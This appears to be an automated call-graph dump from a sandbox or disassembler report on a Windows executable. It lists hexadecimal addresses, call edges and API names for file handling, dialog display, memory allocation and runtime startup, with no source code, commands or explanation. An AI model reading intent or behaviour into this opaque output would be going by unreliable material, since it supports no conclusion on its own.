40ed89 40013 40ed93 40012->40013 40033 40e570 _wcscat _wcslen _wcsrchr _wcscpy 40012->40033 40043 41c605 40013->40043 40015 40f0f8 40016 40eda9 _wcscpy 40018 40ee2a _wcscpy _wcschr 40016->40018 40108 4091fc 40016->40108 40019 40ef37 40018->40019 40021 40a75f 2 API calls 40018->40021 40047 40a75f 40019->40047 40021->40019 40022 4091fc 2 API calls 40024 40ee7e _wcscpy 40022->40024 40024->40018 40024->40022 40028 40e665 SetFileAttributesW 40029 40e723 GetFileAttributesW 40028->40029 40042 40e660 _memset _wcslen 40028->40042 40031 40e731 DeleteFileW 40029->40031 40029->40042 40031->40042 40033->40015 40035 40ea2d GetDlgItem 40033->40035 40039 40ea47 SendMessageW 40033->40039 40041 40ea6e SendMessageW 40033->40041 40033->40042 40059 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 40033->40059 40065 40d600 72 API calls 5 library calls 40033->40065 40066 419831 40033->40066 40099 4197a3 40033->40099 40034 40ef4b _wcscpy 40053 4092a1 40034->40053 40035->40033 40039->40033 40040 40e774 MoveFileW 40040->40042 40041->40033 40042->40028 40042->40029 40042->40033 40060 40a544 58 API calls 4 library calls 40042->40060 40061 40b8bd 40042->40061 40064 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 40042->40064 40044 41c623 40043->40044 40045 41c613 40043->40045 40111 41c4ef 70 API calls 5 library calls 40044->40111 40045->40016 40048 40a76c __write_nolock 40047->40048 40049 40a77f GetFullPathNameW 40048->40049 40051 40a7cf 40048->40051 40050 40a7a0 40049->40050 40050->40051 40052 40a7b8 GetFullPathNameW 40050->40052 40051->40034 40052->40051 40055 4092ae __write_nolock _wcsncpy 40053->40055 40054 40933e 40056 409220 7 API calls 40054->40056 40058 409362 40054->40058 40055->40054 40055->40058 40112 409220 40055->40112 40056->40058 40058->40033 40059->40033 40060->40042 40131 419d41 40061->40131 40064->40042 40065->40033 40067 41983d __msize 40066->40067 40068 419852 40067->40068 40069 419844 40067->40069 40070 419865 40068->40070 40071 419859 40068->40071 40155 41c2de 40069->40155 40079 4199d7 40070->40079 40097 419872 _realloc ___sbh_resize_block ___sbh_find_block 40070->40097 40073 4197a3 ___free_lc_time 39 API calls 40071->40073 40087 41984c _realloc __msize 40073->40087 40074 419a0a 40183 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40074->40183 40077 419a10 40184 41e06e 39 API calls __getptd 40077->40184 40079->40074 40080 419a2e 40079->40080 40083 419a24 40079->40083 40079->40087 40182 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40079->40182 40080->40087 40186 41e06e 39 API calls __getptd 40080->40186 40185 41e06e 39 API calls __getptd 40083->40185 40084 419a37 GetLastError 40084->40087 40085 4198fd RtlAllocateHeap 40085->40097 40087->40033 40089 4199a5 40089->40087 40091 4199aa GetLastError 40089->40091 40090 4199bd 40090->40087 40181 41e06e 39 API calls __getptd 40090->40181 40091->40087 40094 4199a0 40180 41e06e 39 API calls __getptd 40094->40180 40095 4199ca 40095->40084 40095->40087 40097->40074 40097->40085 40097->40087 40097->40090 40097->40094 40098 41e2c6 __VEC_memcpy VirtualFree VirtualFree ___sbh_free_block 40097->40098 40172 41e263 40097->40172 40178 41ea75 RtlAllocateHeap ___sbh_alloc_block 40097->40178 40179 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40097->40179 40098->40097 40100 4197af __msize 40099->40100 40101 419828 _realloc __msize 40100->40101 40102 41e263 __msize 38 API calls 40100->40102 40103 4197e0 ___free_lc_time 40100->40103 40101->40033 40105 4197c6 ___sbh_find_block 40102->40105 40103->40101 40206 41e06e 39 API calls __getptd 40103->40206 40105->40103 40205 41e2c6 __VEC_memcpy VirtualFree VirtualFree ___BuildCatchObjectHelper 40105->40205 40106 41981a GetLastError 40106->40101 40207 408f98 40108->40207 40111->40045 40123 419e00 40112->40123 40115 409270 40121 40927f 40115->40121 40125 408fe4 40115->40125 40116 409241 40117 4091fc 2 API calls 40116->40117 40119 409247 40117->40119 40120 409283 GetLastError 40119->40120 40122 409261 CreateDirectoryW 40119->40122 40120->40121 40121->40055 40122->40115 40122->40120 40124 40922d CreateDirectoryW 40123->40124 40124->40115 40124->40116 40126 419e00 __write_nolock 40125->40126 40127 408ff1 SetFileAttributesW 40126->40127 40128 409033 40127->40128 40129 40900a 40127->40129 40128->40121 40129->40128 40130 409022 SetFileAttributesW 40129->40130 40130->40128 40134 419c49 40131->40134 40135 419c79 40134->40135 40136 419c59 40134->40136 40139 419c89 40135->40139 40145 419ca9 40135->40145 40149 41e06e 39 API calls __getptd 40136->40149 40138 419c5e 40150 41f4d4 TlsGetValue TlsGetValue GetProcAddress __invoke_watson _raise 40138->40150 40151 41e06e 39 API calls __getptd 40139->40151 40142 419c8e 40152 41f4d4 TlsGetValue TlsGetValue GetProcAddress __invoke_watson _raise 40142->40152 40144 419cf0 40147 40b8d5 GetFileAttributesW 40144->40147 40154 41f239 58 API calls 6 library calls 40144->40154 40145->40144 40145->40147 40153 41f239 58 API calls 6 library calls 40145->40153 40147->40040 40147->40042 40149->40138 40151->40142 40153->40144 40154->40147 40156 41c391 40155->40156 40165 41c2f0 40155->40165 40196 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40156->40196 40158 41c397 40197 41e06e 39 API calls __getptd 40158->40197 40163 41c34d RtlAllocateHeap 40163->40165 40165->40163 40166 41c37d 40165->40166 40169 41c382 40165->40169 40171 41c389 40165->40171 40187 420d0e 39 API calls 2 library calls 40165->40187 40188 420b63 39 API calls 6 library calls 40165->40188 40189 4204aa 40165->40189 40192 41c28f 39 API calls 3 library calls 40165->40192 40193 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40165->40193 40194 41e06e 39 API calls __getptd 40166->40194 40195 41e06e 39 API calls __getptd 40169->40195 40171->40087 40173 41e278 40172->40173 40176 41e28a 40172->40176 40203 41e1a0 39 API calls 8 library calls 40173->40203 40175 41e27e 40175->40176 40204 420456 39 API calls 3 library calls 40175->40204 40176->40097 40178->40097 40179->40097 40180->40089 40181->40095 40182->40079 40183->40077 40184->40087 40185->40089 40186->40084 40187->40165 40188->40165 40198 42047f 40189->40198 40191 4204b7 40192->40165 40193->40165 40194->40169 40195->40171 40196->40158 40197->40171 40199 42048e 40198->40199 40200 420493 GetProcAddress 40199->40200 40201 4204a8 40199->40201 40200->40201 40202 4204a3 40200->40202 40201->40191 40202->40201 40203->40175 40204->40176 40205->40103 40206->40106 40208 419e00 __write_nolock 40207->40208 40209 408fa5 GetFileAttributesW 40208->40209 40210 408fdc 40209->40210 40211 408fb9 40209->40211 40210->40024 40211->40210 40212 408fd1 GetFileAttributesW 40211->40212 40212->40210 40213 4683ac 40214 4683ae 40213->40214 40217 4d0fdc NtAllocateVirtualMemory 40214->40217 40216 4683b3 40218 4d1018 40217->40218 40219 4d101a 40217->40219 40218->40216 40219->40218 40220 4d1022 NtFreeVirtualMemory 40219->40220 40220->40218 40221 229f8c2 40222 229f8cb 40221->40222 40223 229f8d0 40221->40223 40237 229f932 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 40222->40237 40227 229f78c 40223->40227 40230 229f798 ___scrt_is_nonwritable_in_current_image 40227->40230 40228 229f7a7 40229 229f7c1 dllmain_raw 40229->40228 40232 229f7db dllmain_crt_dispatch 40229->40232 40230->40228 40230->40229 40231 229f7bc __DllMainCRTStartup@12 40230->40231 40233 229f82d 40231->40233 40236 229f822 dllmain_raw 40231->40236 40232->40228 40232->40231 40233->40228 40234 229f836 dllmain_crt_dispatch 40233->40234 40234->40228 40235 229f849 dllmain_raw 40234->40235 40235->40228 40236->40233 40237->40223 40238 229f582 40239 229f58d 40238->40239 40245 229f59c 40238->40245 40240 229f5b2 40239->40240 40241 229f592 40239->40241 40248 229f5d5 40240->40248 40242 229f5a8 40241->40242 40243 229f597 40241->40243 40263 229fa6d 23 API calls 40242->40263 40243->40245 40262 229fa8c 21 API calls 40243->40262 40249 229f5e1 ___scrt_is_nonwritable_in_current_image 40248->40249 40264 229fafd 40249->40264 40251 229f64b ___scrt_is_nonwritable_in_current_image __fassign 40251->40245 40252 229f5e8 40252->40251 40253 229f60f 40252->40253 40254 229f6d4 40252->40254 40272 229fa5f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 40253->40272 40275 229fc9c IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __cftof 40254->40275 40257 229f6db 40258 229f61e __RTC_Initialize 40258->40251 40273 229f983 RtlInitializeSListHead 40258->40273 40260 229f62c 40260->40251 40274 229fa34 IsProcessorFeaturePresent ___scrt_release_startup_lock 40260->40274 40262->40245 40263->40245 40265 229fb06 40264->40265 40276 229fe69 IsProcessorFeaturePresent 40265->40276 40267 229fb12 40277 22a08f1 10 API calls 2 library calls 40267->40277 40269 229fb17 40271 229fb1b 40269->40271 40278 22a0926 7 API calls 2 library calls 40269->40278 40271->40252 40272->40258 40273->40260 40274->40251 40275->40257 40276->40267 40277->40269 40278->40271 40279 40f34c 40280 40f356 __EH_prolog __write_nolock 40279->40280 40399 405ffb 40280->40399 40282 40f37d 40283 40f398 40282->40283 40284 40f91b 40282->40284 40298 40f381 40282->40298 40287 40f3a2 40283->40287 40291 40f40b 40283->40291 40283->40298 40285 40f930 SendMessageW 40284->40285 40286 40f93f 40284->40286 40285->40286 40448 40d894 40286->40448 40287->40298 40472 40c05e 40287->40472 40293 40f453 GetDlgItem 40291->40293 40291->40298 40301 40f444 40291->40301 40296 40f467 SendMessageW SendMessageW 40293->40296 40297 40f48d 40293->40297 40294 40f98f GetDlgItem 40300 40f9a5 40294->40300 40295 40f3bf 40295->40298 40299 40f3ce SetDlgItemTextW 40295->40299 40296->40297 40302 40f4aa 40297->40302 40303 40f49e 40297->40303 40299->40298 40458 40f142 40300->40458 40301->40298 40304 40c05e 61 API calls 40301->40304 40316 40c05e 61 API calls 40302->40316 40305 40c05e 61 API calls 40303->40305 40306 40f8c3 SetDlgItemTextW 40304->40306 40308 40f4a8 40305->40308 40310 40f8d6 40306->40310 40403 40cfaa GetDlgItem 40308->40403 40312 40c05e 61 API calls 40310->40312 40313 40f8fb 40312->40313 40319 40c05e 61 API calls 40313->40319 40314 40f4fe 40324 4092a1 7 API calls 40314->40324 40315 40e51e 87 API calls 40348 40f9ee _wcscat 40315->40348 40320 40f4dc 40316->40320 40317 40fa84 40318 40fab2 40317->40318 40322 40c05e 61 API calls 40317->40322 40323 40fb4e 40318->40323 40326 40e51e 87 API calls 40318->40326 40319->40298 40321 40b8bd _swprintf 58 API calls 40320->40321 40321->40308 40325 40fa9c SetDlgItemTextW 40322->40325 40333 40fb7b 40323->40333 40338 405fb8 GetDlgItem 40323->40338 40327 40f522 40324->40327 40328 40c05e 61 API calls 40325->40328 40329 40facb 40326->40329 40330 40f526 GetLastError 40327->40330 40331 40f531 40327->40331 40335 40faac SetDlgItemTextW 40328->40335 40336 40faff 40329->40336 40341 40fadc 40329->40341 40330->40331 40344 40f558 40331->40344 40345 40f54d GetLastError 40331->40345 40332 40fa5f 40332->40317 40337 40fa67 40332->40337 40334 40fba2 40333->40334 40346 40fb9a SendMessageW 40333->40346 40334->40298 40349 40c05e 61 API calls 40334->40349 40335->40318 40339 40fb40 40336->40339 40359 40fb20 DialogBoxParamW 40336->40359 40480 41909a 47 API calls ___free_lc_time 40337->40480 40343 40fb72 40338->40343 40347 40e51e 87 API calls 40339->40347 40340 40c05e 61 API calls 40340->40348 40481 41909a 47 API calls ___free_lc_time 40341->40481 40351 405fb8 GetDlgItem 40343->40351 40352 40f5cc 40344->40352 40356 40f569 GetTickCount 40344->40356 40363 40f5d5 40344->40363 40345->40344 40346->40334 40347->40323 40348->40317 40348->40332 40348->40340 40353 40fbba SetDlgItemTextW 40349->40353 40351->40333 40355 40f7d5 40352->40355 40352->40363 40353->40298 40354 40faf3 40357 4197a3 ___free_lc_time 39 API calls 40354->40357 40412 405fd6 GetDlgItem ShowWindow 40355->40412 40360 40b8bd _swprintf 58 API calls 40356->40360 40362 40fafe 40357->40362 40358 40f76f 40358->40298 40366 40c05e 61 API calls 40358->40366 40359->40298 40359->40339 40364 40f582 40360->40364 40362->40336 40363->40358 40411 40cbab 73 API calls 40363->40411 40479 40888d CreateFileW CreateFileW __write_nolock 40364->40479 40365 40f7e7 40413 405fd6 GetDlgItem ShowWindow 40365->40413 40367 40f782 40366->40367 40369 40b8bd _swprintf 58 API calls 40367->40369 40372 40f7a0 40369->40372 40371 40f7f0 40414 405fb8 GetDlgItem 40371->40414 40383 40c05e 61 API calls 40372->40383 40373 40f619 40376 40b8bd _swprintf 58 API calls 40373->40376 40397 40f642 _realloc ctype 40376->40397 40377 40f5a7 40380 40f5b9 ctype 40377->40380 40381 40f5ae GetLastError 40377->40381 40378 40f7f8 40416 405fd6 GetDlgItem ShowWindow 40378->40416 40380->40352 40381->40380 40382 40f801 SetDlgItemTextW GetDlgItem 40385 40f81f 40382->40385 40384 40f7bb 40383->40384 40417 40e51e 40385->40417 40388 40e51e 87 API calls 40389 40f855 40388->40389 40436 40dfc2 40389->40436 40392 40e51e 87 API calls 40396 40f86e 40392->40396 40393 40f894 40394 405fb8 GetDlgItem 40393->40394 40394->40301 40395 40f766 CloseHandle 40395->40358 40396->40393 40398 40e51e 87 API calls 40396->40398 40397->40358 40397->40395 40398->40393 40400 406004 40399->40400 40401 406026 40399->40401 40400->40401 40482 40bdfb 40400->40482 40401->40282 40404 40cfda ctype 40403->40404 40405 40d00c SendMessageW SendMessageW 40403->40405 40410 40cfe5 ShowWindow SendMessageW SendMessageW 40404->40410 40406 40d040 40405->40406 40407 40d05c SendMessageW SendMessageW SendMessageW 40405->40407 40406->40407 40408 40d0a6 SendMessageW 40407->40408 40409 40d088 SendMessageW 40407->40409 40408->40314 40409->40408 40410->40405 40411->40373 40412->40365 40413->40371 40415 405fd2 40414->40415 40415->40378 40416->40382 40430 40e528 6 library calls 40417->40430 40418 40f0f8 40418->40388 40420 419831 _realloc 42 API calls 40420->40430 40422 4197a3 ___free_lc_time 39 API calls 40422->40430 40423 40e665 SetFileAttributesW 40424 40e723 GetFileAttributesW 40423->40424 40435 40e660 _memset _wcslen 40423->40435 40426 40e731 DeleteFileW 40424->40426 40424->40435 40426->40435 40428 40ea2d GetDlgItem 40428->40430 40429 40b8bd _swprintf 58 API calls 40431 40e763 GetFileAttributesW 40429->40431 40430->40418 40430->40420 40430->40422 40430->40428 40432 40ea47 SendMessageW 40430->40432 40434 40ea6e SendMessageW 40430->40434 40430->40435 40502 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 40430->40502 40505 40d600 72 API calls 5 library calls 40430->40505 40433 40e774 MoveFileW 40431->40433 40431->40435 40432->40430 40433->40435 40434->40430 40435->40423 40435->40424 40435->40429 40435->40430 40503 40a544 58 API calls 4 library calls 40435->40503 40504 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 40435->40504 40437 40dfcc _wcscpy __EH_prolog __write_nolock 40436->40437 40506 4109a9 40437->40506 40439 40dffd _wcscpy 40510 4052b6 40439->40510 40441 40e01b 40514 40714b 40441->40514 40445 40e068 40446 40e077 40445->40446 40536 4071f4 40445->40536 40446->40392 40450 40d8a1 __write_nolock 40448->40450 40449 40d984 GetDlgItem SendMessageW 40456 419298 40449->40456 40450->40449 40451 40d918 SendMessageW 40450->40451 40451->40450 40452 40d92a 40451->40452 41194 40ce40 6 API calls 40452->41194 40454 40d94f SendMessageW 40454->40450 40455 40d962 DeleteObject 40454->40455 40455->40450 40457 4192a5 40456->40457 40457->40294 40459 40f14c __EH_prolog __write_nolock 40458->40459 40460 401788 76 API calls 40459->40460 40461 40f16e 40460->40461 41195 401a03 40461->41195 40466 40f1e7 40469 401951 ctype 76 API calls 40466->40469 40467 41c2de _malloc 39 API calls 40470 40f1b4 _realloc 40467->40470 40468 4197a3 ___free_lc_time 39 API calls 40468->40466 40471 40f1f6 40469->40471 40470->40466 40470->40468 40471->40315 40471->40348 40473 40c06e 40472->40473 40474 40c0a3 LoadStringW 40473->40474 40475 40c0b5 LoadStringW 40473->40475 40474->40475 40476 40c0c3 40474->40476 40475->40476 40477 40bbc4 59 API calls 40476->40477 40478 40c0d1 40477->40478 40478->40295 40479->40377 40480->40317 40481->40354 40489 40bd14 40482->40489 40485 40be1a 40488 40bf29 40485->40488 40492 40bbc4 40485->40492 40486 40c040 40486->40401 40487 40bbc4 59 API calls 40487->40488 40488->40486 40488->40487 40490 40bbc4 59 API calls 40489->40490 40491 40bd3b _wcschr 40490->40491 40491->40485 40493 40bbd1 __write_nolock 40492->40493 40494 40bc2c _strlen 40493->40494 40499 40bc8b _wcsrchr _wcscpy _wcschr _wcsncpy 40493->40499 40500 4111e9 WideCharToMultiByte 40493->40500 40501 4111e9 WideCharToMultiByte 40494->40501 40497 40bc59 _strlen 40498 40b8bd _swprintf 58 API calls 40497->40498 40498->40499 40499->40488 40500->40494 40501->40497 40502->40430 40503->40435 40504->40435 40505->40430 40507 4109b6 _wcslen 40506->40507 40542 4011be 40507->40542 40509 4109ce _wcscpy 40509->40439 40511 4109a9 _wcslen 40510->40511 40512 4011be 76 API calls 40511->40512 40513 4109ce _wcscpy 40512->40513 40513->40441 40515 407155 __EH_prolog 40514->40515 40555 40cc97 40515->40555 40519 4071a5 40562 419be4 40519->40562 40522 4071c3 40524 4080f0 40522->40524 40525 4080fa __EH_prolog __write_nolock 40524->40525 40535 408179 40525->40535 40654 4095ff 40525->40654 40527 40cc97 73 API calls 40527->40535 40528 408248 40530 40c05e 61 API calls 40528->40530 40533 40827f 40528->40533 40531 408276 40530->40531 40658 40df6e 70 API calls 2 library calls 40531->40658 40533->40445 40534 4095ff 4 API calls 40534->40535 40535->40527 40535->40528 40535->40534 40637 407f5d 40535->40637 40537 4071fe __EH_prolog 40536->40537 40539 40721e ctype 40537->40539 41159 414d94 40537->41159 40540 401001 ctype 76 API calls 40539->40540 40541 407240 40540->40541 40541->40446 40543 4011d0 40542->40543 40549 401228 40542->40549 40544 4011f9 40543->40544 40552 4063a1 70 API calls 2 library calls 40543->40552 40545 419831 _realloc 42 API calls 40544->40545 40548 401219 40545->40548 40547 4011ef 40553 4062b8 72 API calls 40547->40553 40548->40549 40554 4062b8 72 API calls 40548->40554 40549->40509 40552->40547 40553->40544 40554->40549 40556 40cbe4 73 API calls 40555->40556 40557 40717f 40556->40557 40558 40cbe4 40557->40558 40559 40cbf3 _memset 40558->40559 40560 40cc0a _wcslen 40558->40560 40559->40519 40576 40cb76 73 API calls _realloc 40560->40576 40566 419bee 40562->40566 40563 41c2de _malloc 39 API calls 40563->40566 40564 4071af 40564->40522 40572 414c9d 40564->40572 40566->40563 40566->40564 40569 419c0a std::bad_alloc::bad_alloc 40566->40569 40577 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 40566->40577 40567 419c30 40581 419bc7 39 API calls std::exception::exception 40567->40581 40569->40567 40578 41bb4b 40569->40578 40570 419c3a CallUnexpected 40573 414ca7 __EH_prolog 40572->40573 40623 410eec 40573->40623 40576->40559 40577->40566 40582 41bb0f 40578->40582 40580 41bb58 40580->40567 40581->40570 40583 41bb1b __msize 40582->40583 40588 4204c2 40583->40588 40587 41bb2c __cinit __msize 40587->40580 40589 41e263 __msize 39 API calls 40588->40589 40590 41bb20 40589->40590 40591 41ba24 40590->40591 40608 41da25 TlsGetValue 40591->40608 40594 41da25 _raise 3 API calls 40595 41ba48 40594->40595 40596 41bacb 40595->40596 40614 420383 39 API calls 3 library calls 40595->40614 40596->40587 40598 41bab2 40599 41d9aa __onexit_nolock 3 API calls 40598->40599 40600 41bac0 40599->40600 40603 41d9aa __onexit_nolock 3 API calls 40600->40603 40601 41ba66 40601->40598 40602 41ba8a 40601->40602 40615 420335 42 API calls _realloc 40601->40615 40602->40596 40606 41baa0 40602->40606 40616 420335 42 API calls _realloc 40602->40616 40603->40596 40606->40596 40617 41d9aa TlsGetValue 40606->40617 40609 41da3d 40608->40609 40612 41da52 __onexit_nolock 40608->40612 40610 41da47 TlsGetValue 40609->40610 40609->40612 40610->40612 40611 41da79 GetProcAddress 40613 41ba38 40611->40613 40612->40611 40612->40613 40613->40594 40614->40601 40615->40602 40616->40606 40618 41d9c2 40617->40618 40621 41d9d7 __onexit_nolock 40617->40621 40619 41d9cc TlsGetValue 40618->40619 40618->40621 40619->40621 40620 41d9fe GetProcAddress 40622 41d9db 40620->40622 40621->40620 40621->40622 40622->40598 40624 410ef6 __EH_prolog 40623->40624 40625 410f26 40624->40625 40626 419be4 42 API calls 40624->40626 40625->40522 40627 410f10 40626->40627 40627->40625 40629 410dd8 40627->40629 40630 410deb 40629->40630 40632 410e51 __init_pointers 40630->40632 40635 4063a1 70 API calls 2 library calls 40630->40635 40634 410ed0 40632->40634 40636 4063a1 70 API calls 2 library calls 40632->40636 40634->40625 40635->40632 40636->40632 40638 407f67 __EH_prolog __write_nolock 40637->40638 40659 401788 40638->40659 40640 407f85 40665 408867 40640->40665 40643 407fa3 40772 401951 40643->40772 40646 4080dd 40646->40535 40648 407fc1 _wcscpy 40648->40643 40651 4095ff 4 API calls 40648->40651 40653 408063 40648->40653 40650 408086 __init_pointers 40650->40643 40692 4035d7 40650->40692 40703 40747f 40650->40703 40651->40648 40689 40724e 40653->40689 40655 409614 40654->40655 40657 409618 40655->40657 41150 4093b9 40655->41150 40657->40525 40658->40533 40660 401792 __EH_prolog 40659->40660 40661 419be4 42 API calls 40660->40661 40664 401827 _memset 40660->40664 40662 401814 40661->40662 40662->40664 40780 409db1 40662->40780 40664->40640 40784 408750 40665->40784 40667 408872 40668 407f9f 40667->40668 40791 40647f 73 API calls 40667->40791 40668->40643 40670 4013a2 40668->40670 40671 4013ac __EH_prolog 40670->40671 40674 4013f5 40671->40674 40686 4013da _wcscpy 40671->40686 40792 406647 40671->40792 40675 4035d7 83 API calls 40674->40675 40680 40156b 40674->40680 40674->40686 40675->40674 40676 4014e2 40678 4197a3 ___free_lc_time 39 API calls 40676->40678 40676->40686 40677 4014f9 40677->40674 40679 4197a3 ___free_lc_time 39 API calls 40677->40679 40678->40686 40679->40674 40681 40c05e 61 API calls 40680->40681 40680->40686 40687 40159f 40680->40687 40683 401595 40681->40683 40682 40142a 40682->40676 40682->40677 40803 40df6e 70 API calls 2 library calls 40683->40803 40685 4035d7 83 API calls 40685->40687 40686->40648 40687->40685 40687->40686 40819 408d5a 40689->40819 40691 40725a 40691->40650 40693 403641 40692->40693 40694 4035e4 40692->40694 40693->40650 40702 408b00 74 API calls 40694->40702 40695 4035e9 40696 40360b 40695->40696 40697 4035ff 40695->40697 40824 401c56 83 API calls 5 library calls 40696->40824 40700 403609 40697->40700 40823 402e66 83 API calls 5 library calls 40697->40823 40700->40693 40825 401a9e 73 API calls ctype 40700->40825 40702->40695 40704 407489 __EH_prolog __write_nolock 40703->40704 40705 4074c7 40704->40705 40749 4074cb ctype 40704->40749 40921 4181af 87 API calls 3 library calls 40704->40921 40706 4074ec 40705->40706 40711 40754c 40705->40711 40705->40749 40708 40750c 40706->40708 40706->40749 40922 406c8a 105 API calls 40706->40922 40708->40749 40923 4181af 87 API calls 3 library calls 40708->40923 40711->40749 40826 40dad2 40711->40826 40713 40777c 40713->40749 40835 4070a9 40713->40835 40715 40769e 40717 4095ff 4 API calls 40715->40717 40718 407723 40715->40718 40715->40749 40717->40718 40718->40713 40924 4072c9 78 API calls ctype 40718->40924 40719 4077b4 40720 407877 40719->40720 40724 4077f5 40719->40724 40722 4078e8 40720->40722 40731 407882 40720->40731 40721 407864 40723 40dad2 63 API calls 40721->40723 40734 40792b 40721->40734 40722->40721 40866 406f6a 40722->40866 40723->40734 40724->40721 40726 4091fc 2 API calls 40724->40726 40728 407827 40726->40728 40727 40799e 40729 407bad 40727->40729 40882 40b7c9 40727->40882 40728->40721 40925 40852b 40728->40925 40759 407bbc 40729->40759 40951 406ce2 93 API calls 40729->40951 40731->40749 40841 406df4 40731->40841 40734->40727 40736 40c05e 61 API calls 40734->40736 40734->40749 40738 407982 40736->40738 40737 407a0a _memcmp 40741 40c05e 61 API calls 40737->40741 40750 407a56 40737->40750 40948 40df6e 70 API calls 2 library calls 40738->40948 40740 407989 40949 406462 73 API calls 40740->40949 40743 407a4c 40741->40743 40950 40df6e 70 API calls 2 library calls 40743->40950 40744 407b5a 40746 407b96 40744->40746 40747 407c89 40744->40747 40746->40729 40754 407bf1 40746->40754 40751 407ca1 40747->40751 40752 407cb7 40747->40752 40747->40759 40748 407b31 40748->40744 40886 408f16 40748->40886 40749->40650 40750->40744 40750->40748 40756 408d5a 74 API calls 40750->40756 40889 40730f 40751->40889 40900 416d42 40752->40900 40754->40759 40760 407c35 40754->40760 40761 407c3c 40754->40761 40756->40748 40758 407cd0 40906 41816c 40758->40906 40763 40c05e 61 API calls 40759->40763 40768 407dd5 40759->40768 40952 4064c2 75 API calls 2 library calls 40760->40952 40953 4073a6 82 API calls 4 library calls 40761->40953 40766 407dcb 40763->40766 40954 40df6e 70 API calls 2 library calls 40766->40954 40768->40749 40915 408987 40768->40915 40770 407e9e 40770->40749 40771 408fe4 2 API calls 40770->40771 40771->40749 40773 40195b __EH_prolog 40772->40773 41115 4052cc 40773->41115 40776 4052cc ctype 39 API calls 40777 40197f 40776->40777 41119 401001 40777->41119 40779 40198a ctype 40779->40646 40781 409dbb __EH_prolog 40780->40781 40782 40cc97 73 API calls 40781->40782 40783 409dcd 40782->40783 40783->40664 40786 40875d __write_nolock 40784->40786 40785 4087b3 CreateFileW 40787 408821 40785->40787 40788 4087e2 GetLastError 40785->40788 40786->40785 40787->40667 40789 4087ff 40788->40789 40789->40787 40790 408803 CreateFileW 40789->40790 40790->40787 40791->40668 40804 401106 40792->40804 40795 408b00 40796 408b12 40795->40796 40797 408b25 40795->40797 40800 408b5d 40796->40800 40817 406372 73 API calls ctype 40796->40817 40799 408b40 GetLastError 40797->40799 40797->40800 40799->40800 40801 408b4a 40799->40801 40800->40682 40801->40800 40818 406372 73 API calls ctype 40801->40818 40803->40687 40805 401118 40804->40805 40812 40116f 40804->40812 40806 401141 40805->40806 40814 4063a1 70 API calls 2 library calls 40805->40814 40807 419831 _realloc 42 API calls 40806->40807 40809 401160 40807->40809 40809->40812 40816 4062b8 72 API calls 40809->40816 40810 401137 40815 4062b8 72 API calls 40810->40815 40812->40795 40814->40810 40815->40806 40816->40812 40817->40797 40818->40800 40820 408d64 __EH_prolog 40819->40820 40822 408b00 74 API calls 40820->40822 40821 408d8c 40821->40691 40822->40821 40823->40700 40824->40700 40825->40693 40827 40dadf __write_nolock 40826->40827 40955 40a0c9 40827->40955 40829 40daf6 40830 40c05e 61 API calls 40829->40830 40831 40db0e 40830->40831 40832 40b8bd _swprintf 58 API calls 40831->40832 40833 40db20 SetDlgItemTextW 40832->40833 40834 40db3d 40833->40834 40834->40715 40836 4070b8 40835->40836 40837 4070f2 40836->40837 40838 40c05e 61 API calls 40836->40838 40837->40719 40839 4070e8 40838->40839 40960 40df6e 70 API calls 2 library calls 40839->40960 40842 406f63 40841->40842 40843 406e0c 40841->40843 40842->40749 40844 409220 7 API calls 40843->40844 40845 406e31 40844->40845 40846 406ed6 __init_pointers 40845->40846 40847 4091fc 2 API calls 40845->40847 40846->40842 40961 40908c 40846->40961 40848 406e42 40847->40848 40850 406e86 40848->40850 40852 408f98 2 API calls 40848->40852 40851 4092a1 7 API calls 40850->40851 40855 406eb2 40850->40855 40853 406e98 40851->40853 40856 406e4f 40852->40856 40854 409220 7 API calls 40853->40854 40854->40855 40855->40846 40858 406ec1 40855->40858 40859 406ee2 40855->40859 40856->40850 40857 40852b 91 API calls 40856->40857 40857->40850 40858->40846 40862 408fe4 2 API calls 40858->40862 40860 40c05e 61 API calls 40859->40860 40861 406eea 40860->40861 40975 40df6e 70 API calls 2 library calls 40861->40975 40862->40846 40864 406ef4 40976 4061be 74 API calls 3 library calls 40864->40976 40868 406f77 __write_nolock 40866->40868 40867 407089 40867->40721 40868->40867 40869 40852b 91 API calls 40868->40869 40870 406fe0 40869->40870 40870->40867 40977 4063f7 74 API calls ctype 40870->40977 40872 407008 40872->40867 40873 40c05e 61 API calls 40872->40873 40874 40702a 40873->40874 40978 40df6e 70 API calls 2 library calls 40874->40978 40876 407033 40877 4092a1 7 API calls 40876->40877 40878 407059 40877->40878 40879 40852b 91 API calls 40878->40879 40880 407085 40879->40880 40880->40867 40979 4063f7 74 API calls ctype 40880->40979 40883 40b7ee 40882->40883 40980 405ef8 40883->40980 40885 40b80e 40885->40737 40995 408ea2 40886->40995 40888 408f28 40888->40744 40890 407319 __EH_prolog 40889->40890 40891 406647 76 API calls 40890->40891 40892 40732b 40891->40892 41001 40b5f4 40892->41001 40894 40738a 40895 407395 40894->40895 40896 4197a3 ___free_lc_time 39 API calls 40894->40896 40895->40759 40896->40895 40898 40733e 40898->40894 40899 40b5f4 89 API calls 40898->40899 41006 40b75c 40898->41006 40899->40898 40901 416d52 40900->40901 40902 416d59 40900->40902 41023 414f5b 39 API calls _memset 40901->41023 40904 416d6a _memset ctype 40902->40904 41024 4062b8 72 API calls 40902->41024 40904->40758 40907 418185 40906->40907 40908 418175 40906->40908 40909 418195 40907->40909 40910 41818e 40907->40910 40914 418183 40908->40914 41025 4173ef 40908->41025 41046 4163b4 90 API calls _realloc 40909->41046 41045 416e1d 90 API calls 3 library calls 40910->41045 40914->40759 40916 408993 40915->40916 40917 408999 40915->40917 40916->40770 40917->40916 40918 4089b7 40917->40918 40919 4089a7 CloseHandle 40917->40919 40918->40916 41075 4062cb 73 API calls ctype 40918->41075 40919->40918 40921->40705 